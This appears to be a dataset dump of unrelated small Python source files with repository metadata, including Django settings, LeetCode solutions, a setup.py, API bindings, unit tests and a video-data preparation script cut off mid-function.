self._contacts_dict = defaultdict(dict)
self._ephys_dict = defaultdict(dict)
self._probes_dict = defaultdict(dict)
self._nwbfile_name_dict = defaultdict(dict)
self.datafiles_list = []
@abstractmethod
def _extract_metadata(self):
pass
@abstractmethod
def organize(self):
pass
def get_subject_names(self):
return list(self._participants_dict['data']['ParticipantID'])
def get_session_names(self, subject_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
return list(self._sessions_dict[subject_name]['data']['session_id'])
def get_channels_info(self, subject_name=None, session_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
if session_name is None:
session_name = self.get_session_names()[0]
return self._channels_dict[subject_name][session_name]['data'].to_dict()
def get_contacts_info(self, subject_name=None, session_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
if session_name is None:
session_name = self.get_session_names()[0]
return self._contacts_dict[subject_name][session_name]['data'].to_dict()
def get_ephys_info(self, subject_name=None, session_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
if session_name is None:
session_name = self.get_session_names()[0]
return self._ephys_dict[subject_name][session_name]['data']
def get_probes_info(self, subject_name=None, session_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
if session_name is None:
session_name = self.get_session_names()[0]
return self._probes_dict[subject_name][session_name]['data'].to_dict()
def get_participants_info(self):
return self._participants_dict['data'].to_dict()
def get_dataset_description(self):
return self._dataset_desc_json['data']
def get_session_info(self, subject_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
return self._sessions_dict[subject_name]['data'].to_dict()
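# Minimal sketch of a concrete converter (illustrative only; everything except the two
# abstract hooks is an assumption, not part of this module):
#   class MyFormatConverter(BidsConverter):
#       def _extract_metadata(self):
#           ...  # fill self._participants_dict, self._sessions_dict, etc. from the source files
#       def organize(self):
#           ...  # write the organized folder layout under self.dataset_path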
| [
"[email protected]"
] | |
4fe98793df58d5e1bf85fc96af28a813a0e52817 | 906e8d5711f64b45db1541ea15ab5de50c73fafa | /src/api/listeners/console.py | 9ab2fd7769322fa1b97d3a3048b9ab91dc515ed7 | [
"MIT"
] | permissive | yagrxu/infrabox | 079cb2f04f13dc31811698fe94354e32e8ea91e1 | 1d8789db1968897fd471d4dbc1480395d365ff85 | refs/heads/master | 2021-04-15T10:31:54.697521 | 2018-03-21T21:48:12 | 2018-03-21T21:48:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | import json
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
from eventlet.hubs import trampoline
from pyinfraboxutils.db import connect_db
from pyinfraboxutils import dbpool
from pyinfraboxutils import get_logger
logger = get_logger('console_listener')
def __handle_event(event, socketio, client_manager):
job_id = event['job_id']
console_id = event['id']
if not client_manager.has_clients(job_id):
return
logger.info('start console %s', console_id)
conn = dbpool.get()
try:
r = conn.execute_one('''
SELECT output FROM console WHERE id = %s
''', [console_id])
        logger.info('retrieved console %s', console_id)
if not r:
return
r = r[0]
socketio.emit('notify:console', {
'data': r,
'job_id': job_id
}, room=job_id)
finally:
dbpool.put(conn)
logger.info('stop console %s', console_id)
def listen(socketio, client_manager):
while True:
try:
__listen(socketio, client_manager)
except Exception as e:
logger.exception(e)
def __listen(socketio, client_manager):
conn = connect_db()
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
cur = conn.cursor()
cur.execute("LISTEN console_update")
while True:
trampoline(conn, read=True)
conn.poll()
while conn.notifies:
n = conn.notifies.pop()
socketio.start_background_task(__handle_event,
json.loads(n.payload),
socketio,
client_manager)
| [
"[email protected]"
] | |
9e59cfabe06d7aee1aed1b645a3af1b9c7cbd09a | 825f89203b1f1b1c5e05bab87b764cfd78c9e64d | /mysite/mysite/settings.py | 4854e96520e9fd88ceb8cc9debbd79b45583ce1b | [] | no_license | jaredharley/learn-python | d3086967c1f67a0baa48071e3c7a359da88ebfbd | d54926714ac399e317d723cb237328bfdf0dbec2 | refs/heads/master | 2016-09-05T13:28:37.685244 | 2016-01-06T05:00:04 | 2016-01-06T05:00:04 | 28,735,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,132 | py | """
Django settings for mysite project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^64z^z=y70*bafuc2%w#le0%j%fo7a3jvc%1&0hmg^ah*z%$_k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'polls',
'todo',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
# Template
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')] | [
"[email protected]"
] | |
c9457f2571685a6762cf2e937a5be97dcb5f5e05 | 205c1bd0e473f0e9aa31db1256aec5d1f5a233d4 | /word break/1.py | bc1b430c1b4d8348d2f9deda7ddead62247e4488 | [
"MIT"
] | permissive | cerebrumaize/leetcode | 4256215a3762a5de7f3258d43a03cae11357641d | 869ee24c50c08403b170e8f7868699185e9dfdd1 | refs/heads/master | 2021-01-12T09:20:10.891530 | 2017-10-17T06:15:21 | 2017-10-17T06:15:21 | 76,133,209 | 0 | 0 | null | 2016-12-23T07:22:58 | 2016-12-10T19:31:44 | Python | UTF-8 | Python | false | false | 694 | py | #!/usr/bin/env python
'''Word Break: decide whether a string can be segmented into a sequence of dictionary words.'''
# pylint: disable = I0011, E0401, C0103
class Solution(object):
    '''Dynamic-programming solution: d[i] is True when s[:i+1] can be segmented into dictionary words.'''
def func(self, s, wordDict):
        '''Return True if s can be split entirely into words from wordDict.'''
d = [False] * len(s)
for i in range(len(s)):
for w in wordDict:
if w == s[i-len(w)+1: i+1] and ((d[i-len(w)]) or i-len(w) == -1):
d[i] = True
continue
return d[-1]
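# Example (illustrative): Solution().func('words', ['word', 'words', 'list']) returns True
# because 'words' is itself a dictionary word; Solution().func('wordx', ['word']) returns False.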
def main():
'''main function'''
_solution = Solution()
res, inp = [], [('words', ['word', 'words', 'list'])]
for i in inp:
print(_solution.func(i[0], i[1]))
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
630e3b59bc97ae65efd9cdf123fa18dc17a216c8 | 69c81130633ba4d41b1ec938f0fc586f777e95ba | /setup.py | 7e3762cd896e38a132a848717fe69bc6b7b3c13b | [
"ISC"
] | permissive | pregiotek/drf-tracking | d8ff934e884e7908f997f524d4e363914c2f11b2 | f40c87a7e392009cdffa7b893e964b51f2faeb5b | refs/heads/master | 2021-01-18T07:51:57.961574 | 2016-09-09T14:34:44 | 2016-09-09T14:34:44 | 67,803,102 | 1 | 0 | null | 2016-09-09T13:54:10 | 2016-09-09T13:54:08 | Python | UTF-8 | Python | false | false | 2,771 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
from setuptools import setup
name = 'drf-tracking'
package = 'rest_framework_tracking'
description = 'Utils to log Django Rest Framework requests to the database'
url = 'https://github.com/aschn/drf-tracking'
author = 'Anna Schneider'
author_email = '[email protected]'
license = 'BSD'
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
if os.system("pip freeze | grep wheel"):
print("wheel not installed.\nUse `pip install wheel`.\nExiting.")
sys.exit()
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=[],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
]
)
| [
"[email protected]"
] | |
597769bb6af4fe6e7af805283822cccd04fed89e | 69bfc9d5bf983ca0cf98ed53f8eace0f1b77e60b | /application/controllers/pies/delete.py | b9c3d21a4512a2834344692d64fa18f28265432c | [] | no_license | RicardoAntonio24/otomi | 679c26f4c85b7782bfbd768e5f16f33524599f2f | 1f40bd3b5af1337c1c6c518d7289d13538da7568 | refs/heads/master | 2020-05-24T04:39:28.208177 | 2019-05-16T21:19:57 | 2019-05-16T21:19:57 | 187,097,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,935 | py | import config
import hashlib
import app
class Delete:
def __init__(self):
pass
'''
def GET(self, id_palabra_pies, **k):
if app.session.loggedin is True: # validate if the user is logged
# session_username = app.session.username
session_privilege = app.session.privilege # get the session_privilege
if session_privilege == 0: # admin user
return self.GET_DELETE(id_palabra_pies) # call GET_DELETE function
            elif session_privilege == 1: # guess user
raise config.web.seeother('/guess') # render guess.html
else: # the user dont have logged
raise config.web.seeother('/login') # render login.html
def POST(self, id_palabra_pies, **k):
if app.session.loggedin is True: # validate if the user is logged
# session_username = app.session.username
session_privilege = app.session.privilege
if session_privilege == 0: # admin user
return self.POST_DELETE(id_palabra_pies) # call POST_DELETE function
elif session_privilege == 1: # guess user
raise config.web.seeother('/guess') # render guess.html
else: # the user dont have logged
raise config.web.seeother('/login') # render login.html
@staticmethod
def GET_DELETE(id_palabra_pies, **k):
@staticmethod
def POST_DELETE(id_palabra_pies, **k):
'''
def GET(self, id_palabra_pies, **k):
message = None # Error message
id_palabra_pies = config.check_secure_val(str(id_palabra_pies)) # HMAC id_palabra_pies validate
result = config.model.get_pies(int(id_palabra_pies)) # search id_palabra_pies
result.id_palabra_pies = config.make_secure_val(str(result.id_palabra_pies)) # apply HMAC for id_palabra_pies
return config.render.delete(result, message) # render delete.html with user data
def POST(self, id_palabra_pies, **k):
form = config.web.input() # get form data
form['id_palabra_pies'] = config.check_secure_val(str(form['id_palabra_pies'])) # HMAC id_palabra_pies validate
result = config.model.delete_pies(form['id_palabra_pies']) # get pies data
if result is None: # delete error
            message = "El registro no se puede borrar" # Error message
            id_palabra_pies = config.check_secure_val(str(id_palabra_pies)) # HMAC user validate
result = config.model.get_pies(int(id_palabra_pies)) # get id_palabra_pies data
result.id_palabra_pies = config.make_secure_val(str(result.id_palabra_pies)) # apply HMAC to id_palabra_pies
return config.render.delete(result, message) # render delete.html again
else:
raise config.web.seeother('/pies') # render pies delete.html
| [
"[email protected]"
] | |
5366df88285235633e44287a3950189650d383b1 | 2d9cea7839a900921850f2af1ccafc623b9d53b9 | /websecurityscanner/google/cloud/websecurityscanner_v1alpha/types.py | 594571c6551b0c0557820428c4ec53212cbc344e | [
"Apache-2.0"
] | permissive | smottt/google-cloud-python | cb28e8d59cc36932aa89e838412fe234f6c4498c | 2982dd3d565923509bab210eb45b800ce464fe8a | refs/heads/master | 2020-03-31T21:12:02.209919 | 2018-10-10T18:04:44 | 2018-10-10T18:04:44 | 152,571,541 | 0 | 1 | Apache-2.0 | 2018-10-11T10:10:47 | 2018-10-11T10:10:47 | null | UTF-8 | Python | false | false | 2,175 | py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import sys
from google.api import http_pb2
from google.protobuf import descriptor_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
from google.protobuf import timestamp_pb2
from google.api_core.protobuf_helpers import get_messages
from google.cloud.websecurityscanner_v1alpha.proto import crawled_url_pb2
from google.cloud.websecurityscanner_v1alpha.proto import finding_addon_pb2
from google.cloud.websecurityscanner_v1alpha.proto import finding_pb2
from google.cloud.websecurityscanner_v1alpha.proto import (
finding_type_stats_pb2)
from google.cloud.websecurityscanner_v1alpha.proto import scan_config_pb2
from google.cloud.websecurityscanner_v1alpha.proto import scan_run_pb2
from google.cloud.websecurityscanner_v1alpha.proto import (
web_security_scanner_pb2)
_shared_modules = [
http_pb2,
descriptor_pb2,
empty_pb2,
field_mask_pb2,
timestamp_pb2,
]
_local_modules = [
crawled_url_pb2,
finding_addon_pb2,
finding_pb2,
finding_type_stats_pb2,
scan_config_pb2,
scan_run_pb2,
web_security_scanner_pb2,
]
names = []
for module in _shared_modules:
for name, message in get_messages(module).items():
setattr(sys.modules[__name__], name, message)
names.append(name)
for module in _local_modules:
for name, message in get_messages(module).items():
message.__module__ = 'google.cloud.websecurityscanner_v1alpha.types'
setattr(sys.modules[__name__], name, message)
names.append(name)
__all__ = tuple(sorted(names))
| [
"[email protected]"
] | |
d0f53731c66521d73bfc425db0bd9aa49b385163 | 5d355461220921ccee1b96b764452da26d40f304 | /leadmanager/accounts/serializers.py | 2a069ad4eb67eb9641ec740e6c82d8b4989dd596 | [] | no_license | craigbunton/lead_manager_react_django | ec36dc1a1e376ed1d1a1305b5d480675e9bd7872 | 7f5b35f2978b0350b29e98462ae0afd84c725832 | refs/heads/master | 2023-01-29T03:26:35.390790 | 2020-01-23T10:46:24 | 2020-01-23T10:46:24 | 218,880,992 | 0 | 0 | null | 2023-01-07T11:17:35 | 2019-10-31T23:58:53 | JavaScript | UTF-8 | Python | false | false | 1,080 | py | from rest_framework import serializers
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
# User Serializer
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "username", "email")
# Register Serializer
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "username", "email", "password")
extra_kwargs = {"password": {"write_only": True}}
def create(self, validated_data):
user = User.objects.create_user(
validated_data["username"],
validated_data["email"],
validated_data["password"],
)
return user
# Login Serializer
class LoginSerializer(serializers.Serializer):
username = serializers.CharField()
password = serializers.CharField()
def validate(self, data):
user = authenticate(**data)
if user and user.is_active:
return user
raise serializers.ValidationError("Incorrect Credentials")
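# Illustrative view-side usage (assumed, not part of this module):
#   serializer = RegisterSerializer(data=request.data)
#   serializer.is_valid(raise_exception=True)
#   user = serializer.save()  # calls create() above
# LoginSerializer.validate() returns the authenticated User, so validated_data is the
# user object on success.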
| [
"[email protected]"
] | |
5b359b667dad448b3a80c84e30867c87d641f496 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/pa3/sample/str_get_element-42.py | 890eb44f037c7631688f2cc5967b68b4d12596ca | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | x:str = "abc"
a:str = ""
b:str = ""
c:str = ""
def str_get(s:str, $TypedVar) -> str:
return s[i]
a = str_get(x, 0)
b = str_get(x, 1)
c = str_get(x, 2)
print(a)
print(b)
print(c)
| [
"[email protected]"
] | |
00c829a3af846d4b674adb602f7b10fbd85dd30f | 03408fccb18ad545aea32ca3fe82acae54261a1f | /check for n and its double.py | 4e34fa68d1c04ef9fd8d3f52054524222fa35179 | [] | no_license | rehoboth23/leetcode-base | 7253f768da27a75650704980f0e0ab039123e84d | 9d8dfd05f6367ea2b5e2b1c490f09a18fa5e8a14 | refs/heads/main | 2023-01-02T11:11:07.539139 | 2020-10-25T17:41:53 | 2020-10-25T17:41:53 | 307,154,350 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | class Solution:
"""
    Keep a set of the values seen so far; for each element, check for its double or half
    before adding it, so a single 0 cannot match itself.
    Example: [10, 2, 5, 3] -> True because 5 * 2 == 10.
"""
def checkIfExist(self, arr: [int]) -> bool:
s = set()
for i in arr:
if 2 * i in s:
return True
if i / 2 in s:
return True
            s.add(i)
        return False | [
"[email protected]"
] | |
e5aa8b2e31423c297291bfb6fa1566f5d4d0ffd4 | 87026962f460910c8ea3319f26bce1fcb9b0d9b0 | /comprehensions/os_walk.py | 83e8c9417ed835292bb5d48dacdad3760e4fb3b9 | [] | no_license | psyoblade/python-for-dummies | 566cf772dee4c99e32202d9975470756e0a12ac0 | edf1aec90cda81ccb6a40785bd6fd7b110173e72 | refs/heads/master | 2022-05-31T18:08:28.608291 | 2022-05-05T10:37:12 | 2022-05-05T10:37:12 | 123,752,733 | 0 | 0 | null | 2022-05-05T01:10:41 | 2018-03-04T03:19:57 | Python | UTF-8 | Python | false | false | 526 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
# [ value ]
def os_walk_dirs(root, ext):
return [os.path.join(d[0], f) for d in os.walk(root) for f in d[2] if f.endswith(ext)]
# for python_file in os_walk_dirs('.', '.py'):
# print(python_file)
inner_outer = [str(inner) + ":" + str(outer) for inner in range(0,5) for outer in range(6,9)]
print(inner_outer)
outer_inner = [[str(inner) + ":" + str(outer) for inner in range(0,5)] for outer in range(6,9)]
print(outer_inner)
assert(inner_outer != outer_inner) | [
"[email protected]"
] | |
ab5719fac5041d62271c2e6278c29f604e00f121 | 14fdd90df17717516b6ef7496f2934f9f9614d9d | /rest_app/main.py | 7ccc7e10ad7aa88f587a92ff0855ba9e81de9237 | [] | no_license | rafee/mlDataAssignment | 16ea10526f559a99686f109e9c8236e88d8e3b6e | db3792fa6da3469ae185f5199f8807dac14a81b5 | refs/heads/master | 2020-08-24T12:52:27.609709 | 2019-11-08T23:24:10 | 2019-11-08T23:24:10 | 216,829,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,944 | py | from flask import Flask, jsonify, request
import csv
from google.cloud import storage
app = Flask(__name__)
def parse_method(BUCKET='assignment1-data', FILE='Input-Data/NDBench-testing.csv'):
client = storage.Client()
bucket = client.get_bucket(BUCKET)
blob = bucket.get_blob(FILE)
csv_data = blob.download_as_string()
read_data = csv.reader(csv_data.decode("utf-8").splitlines())
return list(read_data)
@app.route('/')
def hello():
"""Return a friendly HTTP greeting."""
return 'Hello World!'
@app.route('/v1/mldata/', methods=["GET"])
def GetSamples():
RFWID = request.headers.get('rfwid')
RFWID = int(RFWID)
benchmarkType_source = request.args['source']
benchmarkType_type = request.args['type']
workloadMetric = request.args['workloadMetric']
batchUnit = request.args['batchUnit']
batchId = request.args['batchId']
batchSize = request.args['batchSize']
bucket = 'assignment1-data'
file = 'Input-Data/'+benchmarkType_source+'-'+benchmarkType_type+'.csv'
loaded_data = parse_method(bucket, file)
loaded_data = loaded_data[1:] # Skipping first row
batchId = int(batchId)
batchUnit = int(batchUnit)
batchSize = int(batchSize)
starting_index = (batchId-1)*batchUnit
finishing_index = (batchId+batchSize-1)*batchUnit
lookup_dict = {'CPU': 0, 'NetworkIn': 1, 'NetworkOut': 2, 'Memory': 3}
metricIndex = lookup_dict[workloadMetric]
outputs = [float(data[metricIndex]) for data in loaded_data]
outputs = outputs[starting_index:finishing_index]
return jsonify(rfwid=RFWID, lastbatchId=batchId+batchSize - 1, samples=outputs)
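# A hypothetical request against the route above (host, port and parameter values
# are illustrative only):
#   curl -H "rfwid: 1" \
#     "http://127.0.0.1:8080/v1/mldata/?source=NDBench&type=testing&workloadMetric=CPU&batchUnit=60&batchId=1&batchSize=2"
# This reads Input-Data/NDBench-testing.csv from the bucket and returns the first
# 2 batches of 60 CPU samples, reporting lastbatchId=2 in the JSON response.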
if __name__ == '__main__':
# This is used when running locally only. When deploying to Google App
# Engine, a webserver process such as Gunicorn will serve the app. This
# can be configured by adding an `entrypoint` to app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
| [
"[email protected]"
] | |
36fddc7fd02e3a92abe9ba83dd50b520aac10d94 | 16d86ac6f2a8b471f8bf56fb47561eb1230a2be7 | /Exemplos/CursoPython/Aula02/exemplo_classes.py | e42e324053892d2a0efa7afc37b22dec2d92316c | [
"MIT"
] | permissive | Winderson/inteligencia-artificial-1 | f872a38c156690e257fcae8bd0fee2106a8af36f | 19acf6ce5c6d14f306f47bd1a07e227633458df9 | refs/heads/master | 2020-03-30T07:24:41.005736 | 2018-09-26T23:29:26 | 2018-09-26T23:29:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,188 | py | #!/usr/bin/env python
# SYNTAX:
# class <ClassName>(<parent_class>):
#     <methods>
from typing import List
import numpy as np
class Aluno():
"""Representa um aluno da escola."""
def __init__(self, nome:str = ''):
"""Construtor da classe."""
# No construtor sao declarados os atributos
# Atributos sao sempre publicos
# self.nome = nome
# self.sobrenome = ''
# self.notas = [0, 0]
        # Protected attributes
# self._nome = nome
# self._sobrenome = ''
# self._notas = []
        # Private attributes
self.__nome = nome.upper()
self.__sobrenome = ''
self.__notas = []
def __str__(self):
texto = ''
texto += f'Nome.....: {self.__nome} {self.__sobrenome}\n'
texto += f'Notas....: {self.__notas}\n'
texto += f'Media....: {self.media()}\n'
return texto
def __lt__(self, other):
return self.media() < other.media()
    # @property: decorator - injects code into a function
    # Used here to generate a getter
@property
def nome(self):
return self.__nome.upper()
@nome.setter
def nome(self, nome):
self.__nome = nome
@property
def sobrenome(self):
return self.__sobrenome.upper()
@sobrenome.setter
def sobrenome(self, sobrenome):
self.__sobrenome = sobrenome
@property
def notas(self):
return self.__notas
@notas.setter
def notas(self, notas: List[float]):
for nota in notas:
if nota < 0 or nota > 100:
raise RuntimeError('Nota fora do intervalo 0..100')
self.__notas = notas
def media(self):
return np.mean(self.__notas)
def main():
aluno1 = Aluno()
aluno1.nome = 'Joaquim'
aluno1.sobrenome = 'Branganca e Orleans'
aluno1.notas = [90, 100]
aluno2 = Aluno('Carlinhos')
aluno2.notas = [20, 90]
aluno3 = Aluno(nome='Chiquinha')
print(f'Nome.....: {aluno1.nome} {aluno1.sobrenome}')
print(f'Notas....: {aluno1.notas}')
print(f'Media....: {aluno1.media()}')
print(aluno2)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
da3e82dfc76303e43f05fa7cf081576377d5b684 | d6b99ab3cc7108f4f0cc0be899641ac990e30db9 | /multipleOf3or5/test.py | a42133ea858991b66c5473b82f3bb50e49e4df3b | [] | no_license | AsemAntar/codewars_problems | ef97e8a8058551276cdb943a07474cbeb9353c4d | c0ae0a769e16211c2b8e325d1116a6cebd3be016 | refs/heads/master | 2020-08-10T02:01:12.411030 | 2019-12-15T22:45:20 | 2019-12-15T22:45:20 | 214,229,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,402 | py | import unittest
from multiple_of_3_or_5 import solutions, solution, math_solution
class TESTSOLUTIONS(unittest.TestCase):
def test_solutions(self):
with self.subTest():
self.assertEqual(solutions(10), 23, 'should be 23')
with self.subTest():
self.assertEqual(solutions(11), 33, 'should be 33')
with self.subTest():
self.assertEqual(solutions(16), 60, 'should be 60')
with self.subTest():
self.assertEqual(solutions(26), 168, 'should be 168')
def test_solution(self):
with self.subTest():
self.assertEqual(solution(10), 23, 'should be 23')
with self.subTest():
self.assertEqual(solution(11), 33, 'should be 33')
with self.subTest():
self.assertEqual(solution(16), 60, 'should be 60')
with self.subTest():
self.assertEqual(solution(26), 168, 'should be 168')
def test_math_solution(self):
with self.subTest():
self.assertEqual(math_solution(10), 23, 'should be 23')
with self.subTest():
self.assertEqual(math_solution(11), 33, 'should be 33')
with self.subTest():
self.assertEqual(math_solution(16), 60, 'should be 60')
with self.subTest():
self.assertEqual(math_solution(26), 168, 'should be 168')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
1a3b2dcbc469c0bd1ee4f977fbf9cca6dd710acc | 05b262df0935338ed8b86110acad96332a5ba424 | /{{cookiecutter.directory_name}}/{{cookiecutter.pkg_name}}/tests/unit/route_test.py | abb4ca0d8b717e4b65d96acade0f0e7353d4498c | [] | no_license | ramonlimaramos/ramons-cookie-py | 0705906060e4f40c35b4b5f46e4cb6d91c0e276d | 2728e35482ca570c34cc13f9e47030a7476c323c | refs/heads/develop | 2023-03-29T20:54:11.332821 | 2021-04-08T20:57:09 | 2021-04-08T20:57:09 | 346,442,689 | 1 | 0 | null | 2021-04-08T20:57:10 | 2021-03-10T17:46:34 | Python | UTF-8 | Python | false | false | 717 | py | from unittest import TestCase
from flask import Flask
from {{cookiecutter.pkg_name}}.tests.mixins import JsonMixin
from {{cookiecutter.pkg_name}}.api import api
class RouteTest(JsonMixin, TestCase):
def setUp(self):
super(RouteTest, self).setUp()
self.app = Flask(__name__)
self.app.register_blueprint(api, url_prefix='/')
self.client = self.app.test_client()
def tearDown(self):
super(RouteTest, self).tearDown()
def when_acess_home(self):
self.response = self.client.get('/home/')
def test_api_home_route_is_up(self):
self.when_acess_home()
self.assert_ok()
self.assert_response_has(message='Hello ramons-cookie-py')
| [
"[email protected]"
] | |
e5abf28f7e9696925ef3d1e4157a0d1afd8b47ba | d5322a991d6d9f1f943efd02b78fb1f32eafdee5 | /cnn-rate-distortion/tools/dataset.py | 4c5aa413db5dfb5152a84d8f5a6c3c6fe03925b9 | [
"Apache-2.0"
] | permissive | duckcrack/cnn-rate-distortion | 9667ae23d6666a2cd63ae55a5206979ed38fa315 | 670826aff3c6232b5b4399f9b80f2078c606f41c | refs/heads/master | 2023-03-17T21:59:25.836891 | 2020-06-18T15:35:33 | 2020-06-18T15:35:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,957 | py | #
# Copyright 2020 BBC Research & Development
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from tools.reader import YuvReader
from glob import glob
import os
import re
import h5py
import numpy as np
def shape_from_filename(filename):
rgx = re.compile(r'([0-9]+)x([0-9]+)')
result = re.search(rgx, filename)
width = int(result.group(1))
height = int(result.group(2))
return width, height
def qp_from_file_name(filename):
rgx = re.compile(r'QP_([0-9]+)')
result = re.search(rgx, filename)
qp = float(result.group(1))
return qp
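# Illustrative (hypothetical) filenames showing what the two regex helpers above expect:
#   shape_from_filename("BasketballDrill_832x480_50.yuv")  -> (832, 480)
#   qp_from_file_name("BasketballDrill_832x480_QP_32.yuv") -> 32.0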
def read_single_frame(file_name, width, height, format_='yuv420p'):
with YuvReader(file_name, width, height, format_) as yuv_reader:
y, _, _ = yuv_reader.next_y_u_v()
y = y.astype('float')
return y
def prepare_distortion_data(data_name, orig_dir, reco_dir, width, height, levels, model, h5_dir):
file_name = '{0}_{1}_{2}x{3}.h5'.format(data_name, model, width, height)
file_name = os.path.join(h5_dir, file_name)
with h5py.File(file_name, 'w') as hf:
hf.create_dataset('input', (1, height, width, 2), maxshape=(None, height, width, 2))
hf.create_dataset('label', (1, height, width, 1), maxshape=(None, height, width, 1))
orig_frames = sorted(glob(os.path.join(orig_dir, '*.yuv')))
reco_frames = sorted(glob(os.path.join(reco_dir, '**', '*.yuv')))
img_scale = 2 ** 8 - 1.
qp_scale = 51.
idx = 0
for i in range(len(orig_frames)):
w, h = shape_from_filename(orig_frames[i])
y_orig = read_single_frame(orig_frames[i], w, h)
for j in range(levels):
reco_name = reco_frames[i * levels + j]
qp = qp_from_file_name(reco_name) / qp_scale
